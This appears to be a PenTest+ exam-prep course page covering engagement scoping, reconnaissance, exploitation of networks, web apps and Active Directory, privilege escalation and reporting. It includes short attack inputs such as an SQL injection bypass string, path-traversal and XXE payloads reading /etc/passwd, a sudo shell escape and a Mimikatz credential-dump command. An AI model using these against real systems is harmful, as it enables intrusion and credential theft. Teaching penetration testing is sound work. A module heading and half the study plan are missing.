Master every domain of the CompTIA PenTest+ exam. This course covers the complete penetration testing lifecycle: planning and scoping engagements, passive and active reconnaissance, vulnerability scanning, executing attacks against networks, web applications, wireless, and Active Directory, post-exploitation techniques, professional reporting, and the tools every pentester uses — with real commands, YAML examples, and exam-aligned scenarios throughout.
Advanced7 modules~35 hours60 practice questions
🎧
Study ethical hacking on the go with our IT certification podcast
Nmap tricks, Metasploit walkthroughs, and PenTest+ exam strategies explained for commutes and workouts. New episodes weekly.
The Rules of Engagement (ROE) defines what you can test and how. The authorization letter (get-out-of-jail-free letter) is signed proof of permission. Both are required before any active testing begins. A missing authorization letter exposes the tester to criminal liability — even with the client's verbal approval.
CVSS Scoring — What the Exam Expects
Critical (9.0–10.0): Remote, unauthenticated, no user interaction, full CIA impact
High (7.0–8.9): Remote or requires some privilege; significant impact
Medium (4.0–6.9): Requires local access, user interaction, or limited impact
Low (0.1–3.9): Minimal exploitability or negligible impact
CVSS v3.1 base metrics: Attack Vector, Attack Complexity, Privileges Required, User Interaction, Scope, Confidentiality, Integrity, Availability.
Course Modules
01
Planning, Scoping & Engagement Setup
3 lessons · ~3h
Engagement Types and Legal Foundations
Key Concepts
Black Box: No prior information provided — simulates an external attacker. The tester must discover all targets from scratch through reconnaissance. Most time-consuming but most realistic external threat simulation
White Box (Crystal Box): Full information provided including network diagrams, source code, credentials, and architecture documentation. Most efficient for thorough testing but least realistic as an adversary simulation
Gray Box: Partial information — often low-privilege credentials and a basic network map. Balances realism with efficiency. Most common in real-world assessments
External vs. Internal: External tests target internet-facing systems from outside the network perimeter. Internal tests simulate an insider threat or post-breach attacker from within the network
Social Engineering Assessments: Tests employee susceptibility to phishing, vishing (phone), smishing (SMS), and in-person pretexting. Governed by strict scope rules to avoid harming employees
The PenTest+ exam frequently tests knowledge of these engagement types and when to use each. Gray box is most common in practice because it provides a good balance of realism and coverage efficiency.
Scoping Documents and Legal Agreements
Key Concepts
Statement of Work (SOW): Defines deliverables, timelines, milestones, and payment terms. The contractual backbone of the engagement
Rules of Engagement (ROE): Operational document defining: IP ranges in scope, systems to avoid, allowed attack techniques, testing windows, escalation procedures, and emergency contacts
Non-Disclosure Agreement (NDA): Protects the client's confidential information. Prevents the tester from disclosing findings to third parties
Authorization Letter / Get-Out-of-Jail-Free Letter: Written permission signed by an authorized representative. Proves the testing is legally authorized. Must be available during the engagement
Master Service Agreement (MSA): Umbrella agreement covering all future engagements with a client. Individual engagements are governed by Statements of Work under the MSA
Third-Party Authorization: Any cloud provider, ISP, or co-location facility must separately authorize testing of shared infrastructure. AWS, Azure, and GCP have formal penetration testing policies
Know which document is signed before testing starts. The ROE is operational; the authorization letter provides legal protection; the NDA ensures confidentiality. All three must be in place before any active testing.
Threat Modeling and Compliance Drivers
Key Concepts
STRIDE Threat Model: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege. Used to classify threats during the planning phase
PCI DSS Requirement 11.3: Mandates annual penetration testing and after significant changes. Requires both external and internal tests. Testers must follow a defined methodology
NIST SP 800-115: Technical Guide to Information Security Testing. Defines four phases: planning, discovery, attack, reporting
Bug Bounty Programs: Crowdsourced vulnerability discovery with defined scopes and safe harbor provisions. Differ from traditional pentests in scope, payment structure, and reporting cadence
Compliance drivers determine the frequency and scope of required testing. PCI DSS is the most commonly tested compliance requirement on the PenTest+ exam.
02
Information Gathering & OSINT
3 lessons · ~5h
Passive Reconnaissance Techniques
Key Concepts
WHOIS: Public registration records revealing registrant name, email, registrar, nameservers, and registration dates. Useful for identifying contacts and associated IP ranges
DNS Enumeration: Querying DNS records (A, MX, NS, TXT, CNAME) to map the target's infrastructure. DNS zone transfers (AXFR) can expose all internal records if misconfigured
Google Dorking: Advanced search operators to find indexed sensitive content. Common dorks: site:target.com filetype:pdf, intitle:"index of", site:target.com ext:conf
Shodan: Search engine for internet-facing devices. Indexes port/service data, banners, and vulnerabilities. Used passively — queries go to Shodan's database, not the target
theHarvester: Aggregates email addresses, employee names, subdomains, and IP ranges from search engines, LinkedIn, Shodan, and Hunter.io
Certificate Transparency Logs: Public records of all SSL/TLS certificates issued. crt.sh reveals all subdomains that have received certificates — including staging, admin, and internal-facing hosts
LinkedIn / Social Media: Reveals employee names, job titles, technologies in use (from job postings), and organizational structure for social engineering targeting
On the exam, passive recon = no packets sent to the target. If a technique contacts the target's systems, it is active. Shodan, theHarvester, and Google dorking are passive; Nmap, Nikto, and banner grabbing are active.
Active Scanning and Service Enumeration
Key Concepts
Nmap SYN Scan (-sS): Half-open scan — sends SYN, receives SYN-ACK (open) or RST (closed), then resets. Stealthier than full connect scan because no application-layer session is established
Nmap Full Connect Scan (-sT): Completes the TCP three-way handshake. Slower and generates application logs. Used when -sS is not possible (non-root users)
Service Version Detection (-sV): Probes open ports and identifies the specific service name and version. Critical for identifying outdated, vulnerable software
NSE (Nmap Scripting Engine): Extends Nmap with hundreds of scripts for vulnerability detection, service enumeration, authentication testing, and exploitation. Scripts are categorized: auth, discovery, vuln, exploit
Aggressive Mode (-A): Enables OS detection, version detection, default scripts, and traceroute in one flag. Not recommended for stealth-sensitive engagements
Banner Grabbing: Connecting to a service port and reading the initial response. Tools: Netcat (nc), Telnet, curl. Reveals service type and version without full scanning
SMB Enumeration (enum4linux): Retrieves shares, users, groups, password policy, and OS info from Windows systems via NetBIOS/SMB without credentials (if null sessions are permitted)
Nmap is the most tested tool on PenTest+. Know the key flags: -sS (SYN scan), -sT (connect scan), -sU (UDP), -sV (version), -O (OS), -A (aggressive), -p (ports), --script, -T (timing 0-5).
Vulnerability Scanning
Key Concepts
Nessus: Industry-leading vulnerability scanner. Credentialed scans log into systems to check installed software versions, missing patches, configuration flaws, and user account settings — far more thorough than unauthenticated scans
OpenVAS / Greenbone: Open-source alternative to Nessus. Full vulnerability management platform with web interface, policy management, and reporting
Nikto: Web server scanner testing for outdated server versions, dangerous HTTP methods, default files, and missing security headers. Not a deep application scanner
Credentialed vs. Unauthenticated Scans: Credentialed scans require login credentials and examine internal configuration. Unauthenticated scans only see what is exposed over the network — similar to what an external attacker sees
False Positives and False Negatives: False positives are reported vulnerabilities that do not actually exist. False negatives are real vulnerabilities the scanner missed. Manual verification is always required after automated scanning
Scan Timing and Throttling: Aggressive scan speeds can trigger IDS/IPS alerts or crash fragile systems. Engagement ROE should specify acceptable scan rates
The exam distinguishes between vulnerability scanners (Nessus, OpenVAS — identify and report) and exploitation frameworks (Metasploit, Burp Suite — actually exploit). Know which tools fall into each category.
03
Network Attacks & Exploitation
3 lessons · ~6h
Metasploit Framework
Key Concepts
msfconsole Workflow:search to find modules → use to select → show options to view required settings → set RHOSTS and set PAYLOAD → check to verify vulnerability → run or exploit to execute
Exploit Modules: Contain the attack code targeting a specific vulnerability in a specific software version. Ranked by reliability: Excellent, Great, Good, Normal, Average, Low, Manual
Payloads: Code that executes after successful exploitation. Singles (self-contained), Stagers (download larger payload), Stages (downloaded by stager). Common payloads: meterpreter, shell, cmd/unix/interact
Meterpreter: Advanced in-memory payload providing: file system access, process migration, privilege escalation, keystroke logging, screenshot capture, pivoting, and post-exploitation modules — all without writing to disk
Post-Exploitation Modules: Run after gaining a session: post/multi/recon/local_exploit_suggester for privilege escalation paths, post/windows/gather/hashdump for credential extraction
Sessions:sessions -l lists active sessions. sessions -i [id] interacts with a session. Background active session with Ctrl+Z
The `check` command in Metasploit tests exploitability without executing the payload — always use it first to avoid causing unintended system crashes (especially relevant for EternalBlue/MS17-010 which can BSOD Windows 7).
Network and Protocol Attacks
Key Concepts
ARP Poisoning / MitM: Sending gratuitous ARP replies to poison victim ARP caches. The victim sends traffic to the attacker instead of the real gateway. Tools: arpspoof, bettercap. Requires LAN access
Pass-the-Hash (PtH): Using a captured NTLM hash to authenticate to Windows services without cracking the hash. Possible because NTLM authentication uses the hash directly in the challenge-response protocol
Kerberoasting: Any domain user can request a TGS for any SPN. The TGS is encrypted with the service account's hash and can be cracked offline with Hashcat. High-privilege service accounts with weak passwords are primary targets
AS-REP Roasting: Targets accounts with Kerberos pre-authentication disabled. These accounts return an AS-REP encrypted with their password hash, which can be cracked offline without any domain credentials
Password Spraying: Testing one common password (Password1!) across many accounts to avoid lockout. Contrasts with brute-force (many passwords against one account). Effective against default password policies
Credential Stuffing: Using leaked username/password pairs from data breaches against other services. Exploits password reuse
Windows Active Directory attacks (Pass-the-Hash, Kerberoasting, AS-REP Roasting) are heavily tested on PenTest+. Understand the mechanism behind each attack, not just the tool name.
Wireless and Physical Attacks
Key Concepts
WPA2 PMKID Attack: Modern technique that extracts the PMKID from a single EAPOL frame (no handshake capture needed). The PMKID is computed from the PSK and can be cracked offline. Tools: hcxdumptool + hashcat
Four-Way Handshake Capture: Classic WPA2 cracking method using airodump-ng + aircrack-ng. Capture the handshake during a client authentication event, then crack offline with a dictionary
Evil Twin Attack: Rogue AP with same SSID and higher signal strength. Clients roam to attacker's AP. Deploy a captive portal to capture credentials or intercept HTTP traffic
Deauthentication Attack: Injecting 802.11 deauth frames forces clients to disconnect from the legitimate AP. Combined with evil twin to force reassociation. Tool: aireplay-ng -0
KARMA Attack: The rogue AP responds to probe requests for any SSID, automatically matching whatever the client is looking for. Exploits the Preferred Network List (PNL)
Tailgating / Piggybacking: Following an authorized person through a secure door without badging in. Most common physical security bypass. Prevented by mantraps, turnstiles, and security awareness training
Badge Cloning: Using a Proxmark or similar device to read and clone RFID/HID proximity card data. Many older access control systems use 125kHz cards that have no encryption
Wireless attacks are a significant portion of Domain 3. Know the difference between passive attacks (capturing handshakes) and active attacks (deauth frames, evil twin). Passive analysis of wireless traffic is legal in most jurisdictions; active injection may not be — always check the ROE.
04
Web Application Attacks
3 lessons · ~6h
Injection Vulnerabilities
Key Concepts
SQL Injection (SQLi): Inserting SQL syntax into application inputs to manipulate the database query. Types: in-band (classic), blind (boolean/time-based when no output is returned), out-of-band (data exfiltrated via DNS/HTTP). Tool: sqlmap automates detection and exploitation
Authentication Bypass via SQLi: Classic payload ' OR '1'='1 makes the WHERE condition always true, bypassing credential validation without knowing valid credentials
UNION-Based SQLi: Appends a UNION SELECT statement to the query to retrieve data from other tables. Requires knowing the number of columns in the original query (identify via ORDER BY or error messages)
OS Command Injection: Unsanitized user input passed to a shell function (system(), exec()). Shell metacharacters (;, |, &&, `) chain additional commands. Can lead to RCE
Server-Side Template Injection (SSTI): Template engines (Jinja2, Twig, Freemarker) evaluate expressions. If user input is rendered unsanitized, expressions like {{7*7}} execute code server-side. Can escalate to full RCE
LDAP Injection: Manipulating LDAP queries by injecting special characters (*, ), (, \) into input fields used to construct LDAP filter strings. Can bypass authentication or dump directory data
SQLi remains the most impactful class of web vulnerability. The PenTest+ exam focuses on understanding the mechanism (why it works) as much as the tool (sqlmap). Know how to identify blind vs. in-band SQLi and choose the appropriate testing technique.
Cross-Site Attacks and Client-Side Vulnerabilities
Key Concepts
Reflected XSS: Malicious script is injected into a URL parameter and reflected back in the response without storage. Requires tricking the victim into clicking a crafted link. Common in search boxes and error messages
Stored XSS: Script is persisted in the server's database and executed for every user who loads the affected page. Higher severity because it does not require social engineering to deliver
DOM-Based XSS: The vulnerability exists in client-side JavaScript that reads attacker-controlled data (URL hash, query string) and writes it to the DOM unsanitized. No server-side interaction — the server response is benign
CSRF (Cross-Site Request Forgery): Forces a victim's authenticated browser to make unauthorized state-changing requests to a trusted site. Prevented by anti-CSRF tokens (unique, unpredictable values in every form)
Clickjacking: Overlays a transparent iframe of the target site over a decoy page. Victim clicks on the decoy but the click goes to the target site. Prevented with X-Frame-Options or Content-Security-Policy: frame-ancestors
Open Redirect: Application accepts a URL as a redirect parameter without validation. Attackers craft links using the trusted domain that redirect to malicious sites. Used in phishing campaigns
XSS attack types are a common exam topic. The key distinction: Reflected = immediate response, Stored = persisted in DB, DOM = client-side only. Always check which type is present before testing bypasses.
Advanced Web Vulnerabilities
Key Concepts
Path Traversal (Directory Traversal): Using ../ sequences to access files outside the intended web root. Common payloads: ../../../../etc/passwd, ..\..\Windows\System32\cmd.exe. Some filters require URL encoding: %2e%2e%2f
Server-Side Request Forgery (SSRF): Application fetches URLs provided by the user. Attacker supplies internal URLs: AWS metadata endpoint (169.254.169.254), internal APIs, admin interfaces. Can exfiltrate cloud credentials or scan internal networks
Insecure Direct Object Reference (IDOR): Predictable resource identifiers in URLs or parameters expose other users' data. Changing ?id=1234 to ?id=1235 accesses another user's record. Prevented by authorization checks on every data access
XML External Entity (XXE): Malicious XML input references an external entity. The XML parser resolves it, reading local files or making HTTP requests. Payload: <!ENTITY xxe SYSTEM "file:///etc/passwd">
Insecure Deserialization: Application deserializes attacker-controlled data. Manipulated serialized objects can trigger arbitrary code execution. Affects Java, PHP, Python, and .NET applications using native serialization
SSRF targeting cloud metadata endpoints is one of the most impactful modern web vulnerabilities. AWS IMDSv2 mitigates SSRF by requiring PUT requests with session tokens, but not all organizations have upgraded. Know the 169.254.169.254 address cold.
🎧
Halfway there — reinforce with audio learning
Listening while reviewing notes is one of the most effective PenTest+ study techniques. Our podcast covers real-world attack walkthroughs you'll recognize on the exam.
SUID/SGID Binaries: Files with SUID set run as the file owner (often root). Discovery: find / -perm -4000 -type f 2>/dev/null. GTFOBins documents escape techniques for SUID binaries including vim, find, python, awk, and nmap
Sudo Misconfigurations:sudo -l lists allowed commands. Running allowed binaries with sudo that spawn shells (e.g., sudo vim then :!/bin/bash) grants root access
Cron Job Hijacking: World-writable scripts or binaries called by root-owned cron jobs. Replace or modify the script content to add a SUID binary or reverse shell
Writable /etc/passwd: If the file is world-writable, add a new root user entry with a known password hash. Rare but high impact when found
Kernel Exploits: Exploiting unpatched kernel CVEs (Dirty COW CVE-2016-5195, GameOver(lay) CVE-2023-2640). Check kernel version with uname -r and research applicable exploits
PATH Hijacking: If a SUID binary calls another program by relative path, placing a malicious binary earlier in PATH causes the malicious version to execute with elevated privileges
SUID abuse is the most commonly tested Linux privilege escalation technique on PenTest+. Remember the GTFOBins resource — it catalogs escape techniques for dozens of standard binaries when run with elevated permissions.
Windows Privilege Escalation and Lateral Movement
Key Concepts
Mimikatz sekurlsa::logonpasswords: Extracts plaintext passwords, NTLM hashes, and Kerberos tickets from LSASS memory. Requires SYSTEM or debug privilege. Mitigated by disabling WDigest caching and enabling Credential Guard
Token Impersonation: Stealing security tokens from privileged processes using tools like Incognito (Metasploit module). Allows impersonating domain admins if their tokens are in memory
Unquoted Service Paths: Windows services with unquoted paths containing spaces. Windows resolves C:\Program Files\App\service.exe by trying C:\Program.exe first. Placing a malicious binary at an earlier resolution path escalates privileges
DLL Hijacking: Applications search for DLLs in directories they can write to. Placing a malicious DLL earlier in the search order causes it to load with the application's privileges
Pass-the-Hash: Using captured NTLM hashes with PsExec, Impacket's wmiexec, or CrackMapExec to authenticate to other systems without knowing the plaintext password. Core lateral movement technique
DCSync Attack: Uses the MS-DRSR protocol to simulate a domain controller and request password replication from the real DC. Requires Domain Replication privileges (Domain Admins, Enterprise Admins). Extracts all domain password hashes
Post-exploitation and lateral movement define what separates a pentest from a vulnerability assessment. The PenTest+ exam tests understanding of the full attack chain: initial access → privilege escalation → lateral movement → persistence → data access.
06
Reporting, Communication & Ethics
2 lessons · ~4h
Professional Penetration Test Report Structure
Key Concepts
Executive Summary: Written for non-technical stakeholders. Covers: overall security posture, business risk of findings, prioritized remediation recommendations. No CVE numbers or command output
Methodology: Describes the testing approach, tools used, and standards followed (PTES, OWASP, NIST). Provides context for the technical team
CVSS Scoring: Base score uses AV, AC, PR, UI, S, C, I, A metrics. Critical 9.0–10.0 requires network-accessible, no-auth, no-interaction, full CIA impact. Know the score ranges for all severity levels
Risk Ratings: Risk = Likelihood × Impact. A theoretically critical vulnerability behind multiple compensating controls may be rated lower actual risk. Report both the raw CVSS and the contextual risk
Attack Narrative: Tells the story of the engagement — initial access path, privilege escalation chain, and final impact. Demonstrates real-world business risk to stakeholders who do not read technical details
The exam frequently tests what belongs in the Executive Summary vs. Technical Findings. Rule of thumb: if it contains a command, CVE ID, or screenshot, it belongs in Technical Findings, not the Executive Summary.
Post-Engagement Activities and Ethics
Key Concepts
Cleanup: Remove all backdoors, created accounts, uploaded files, C2 agents, and configuration changes. Document every artifact created and confirm removal. Failure to clean up can result in real attackers leveraging your tools
Remediation Verification (Retesting): After the client patches, retest specific vulnerabilities to confirm fixes are effective. This is a targeted, scoped activity — not a full re-engagement
Data Handling: Securely delete all client data after report delivery per the data handling agreement. Reports containing sensitive data must be encrypted at rest and in transit
Responsible Disclosure: For zero-days found in third-party vendor software, follow coordinated disclosure: notify the vendor, allow a reasonable remediation window (typically 90 days), then disclose publicly
Non-Disclosure: Findings are confidential. Sharing client vulnerabilities with third parties (without authorization) violates the NDA and may constitute criminal computer fraud
Debrief: Walk the client's technical team through findings, reproduction steps, and remediation priorities. Provides context that a written report alone cannot convey
Ethics questions are common on PenTest+. The exam tests whether candidates understand boundaries: you cannot keep access after engagement end, you cannot retain client data beyond the agreed period, and you must disclose zero-days responsibly.
Match tools to their primary use case. The exam often presents a scenario and asks which tool is MOST appropriate. Know the difference between vulnerability scanners (Nessus, Nikto) and exploitation tools (Metasploit, sqlmap).
Burp Suite Deep Dive
Key Concepts
Proxy Module: Intercepts and modifies HTTP/HTTPS traffic between the browser and server. Requires installing Burp's CA certificate in the browser to intercept HTTPS. Core tool for web application testing
Intruder: Automated attack tool for brute-forcing parameters, credential stuffing, fuzzing inputs, and testing all values in a list. Four attack modes: Sniper, Battering Ram, Pitchfork, Cluster Bomb
Repeater: Manually resend and modify individual HTTP requests and view responses. Used to test specific injection points, verify vulnerabilities, and craft exploits
Scanner (Pro): Automated vulnerability scanner that tests for SQLi, XSS, SSRF, XXE, path traversal, and hundreds of other issues. Pro feature — not available in Community edition
SSL Pinning Bypass: When apps implement certificate pinning, Burp's CA is rejected. Bypass using Frida to hook the pinning validation function at runtime or use apktool to patch the APK
Extensions: BApp Store provides community extensions. Notable: Autorize (authorization testing), Param Miner (hidden parameters), J2EEScan, SQLipy
Burp Suite is the dominant web application testing tool in the industry. The PenTest+ exam tests conceptual understanding — knowing what each module does, not every menu option. Focus on Proxy, Intruder, Repeater, and the concept of SSL pinning.
Scripting and Code Analysis
Key Concepts
Python for Pentesting: Socket module for TCP connect scanners; requests module for HTTP testing; subprocess for running OS commands; struct for binary data manipulation. Understanding simple scripts is tested on PenTest+
Bash Scripting: Ping sweeps using loops and ICMP, parsing Nmap output, automating directory enumeration, and one-liner reverse shells. Know shell metacharacters for command injection context
Code Review for Vulnerabilities: Identifying injection sinks (SQL queries, shell commands, template rendering, deserialization), missing input validation, hardcoded credentials, insecure random number generation, and trust boundary violations
Identifying Vulnerability Type from Code: Seeing query = "SELECT * FROM users WHERE name='" + user_input + "'" → SQLi. Seeing os.system("ping " + user_input) → command injection. Seeing exec(user_input) → RCE
The Tools and Code Analysis domain (16%) includes reading short code snippets and identifying the vulnerability or attack technique. Practice recognizing SQLi, command injection, and SSRF patterns in Python, PHP, and Bash code.
4-Week PenTest+ Study Plan
Week 1 — Foundation & Recon
Day 1–2: Planning, scoping, legal documents, engagement types (Module 1)
Day 3–4: Passive recon — OSINT, theHarvester, Shodan, certificate transparency, Google dorks
Day 5–6: Active scanning — Nmap flags, Nikto, enum4linux, vulnerability scanners
Day 7: Quiz session — Planning & Recon domains (pentest-001 to pentest-021)
Week 2 — Attacks & Exploits
Day 1–2: Metasploit framework — modules, payloads, Meterpreter, sessions
Day 3–4: Web attacks — SQLi, XSS, CSRF, path traversal, SSRF, XXE, IDOR
Day 5–6: Full practice quiz runs — timed, all 60 questions, review all incorrect answers
Day 7: Final review of CVSS scoring, tool-to-use-case mapping, and key methodology phases
Top 3 PenTest+ Exam Mistakes
Confusing passive and active recon: Shodan and theHarvester are passive (they query databases, not the target). Nmap and Nikto are active (they send packets to the target). Know this distinction cold.
Mixing up attack techniques: Pass-the-Hash uses NTLM hashes. Kerberoasting cracks service tickets offline. AS-REP Roasting targets accounts with no pre-auth. Golden Ticket forges TGTs with KRBTGT hash. Each has a distinct mechanism.
Getting CVSS scoring wrong: Critical requires network-accessible + no-auth + no-interaction + full CIA impact. Missing any one of these drops to High. Memorize the score ranges: Critical 9.0–10.0, High 7.0–8.9, Medium 4.0–6.9, Low 0.1–3.9.
